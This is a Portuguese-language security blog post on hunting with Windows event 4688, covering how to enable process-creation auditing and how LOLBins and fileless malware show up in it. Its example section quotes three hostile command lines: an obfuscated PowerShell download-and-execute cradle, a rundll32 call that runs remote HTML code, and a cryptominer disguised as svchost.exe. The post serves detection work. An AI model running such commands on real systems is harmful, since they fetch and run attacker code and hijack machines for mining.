Hunting 4688

O evento de segurança 4688 é gerado sempre que um novo processo é iniciado.

Analisando o Windows Logging Attack Matrix é possível verificar que o evento 4688 cobre as táticas de:

  • Discovery
  • Initial Access
  • Collection
  • Command and Control
  • Credential Access
  • Persistence
  • Defense Evasion
  • Lateral Movement
  • Privilege Escalation

A partir da versão Windows Server 2012 R2, Windows 8.1 o campo “Linha de comando do processo” foi adicionado

Infelizmente, o log de ID de evento 4688 não está habilitado por padrão. No entanto, habilitá-lo é relativamente simples e pode ser feito globalmente por meio do Windows Group Policy Object (GPO).

Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Detailed Tracking\Audit Processe Creation

LOLBIN e Fileless Malware

LOLBins são perigosos porque sua execução parece legitima no início e às vezes até segura. Além disso, o uso de um arquivo assinado e verificado digitalmente aumenta a falsa segurança e mantém fora do radar.
Saiba mais no artigo Living Off the Land Binaries (LOLBins)

O termo Fileless Malware é usado para descrever uma categoria de malware que opera apenas na memória e não grava arquivos no disco.

Através do monitoramento do evento 4688 é possível ter uma atenção maior a esses recursos usados por “mineradores de cripto moedas e atacantes.

Exemplos:


cmd.exe /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).(‘Down’+’loadFile’).Invoke(‘hxxps://tinyurl.com/y6vlgvu’,’pd.bat’)

rundll32.exe hxxp://hpsjh.firewall-gateway.net:8080/MicrosoftUpdate?6MCQ7QNK9=849c0ca5ba1a4e34b50a86a8c092b973;U5AVOFNB6B=;......./mshtml,RunHTMLApplication

svchost.exe -B — coin=monero — url=xmr.pool.minergate.com:45700 — user=eaz0xj5zhawrnds — pass=x — cpu-max-threads-hint=50 — donate-level=4

Evento 4688

Anúncio

Sobre Daniel Donda 549 Artigos
Olá, meu nome é Daniel Donda e sou especialista em cibersegurança, autor de livros, professor e palestrante. Saiba mais

Seja o primeiro a comentar

Faça um comentário

Seu e-mail não será divulgado.


*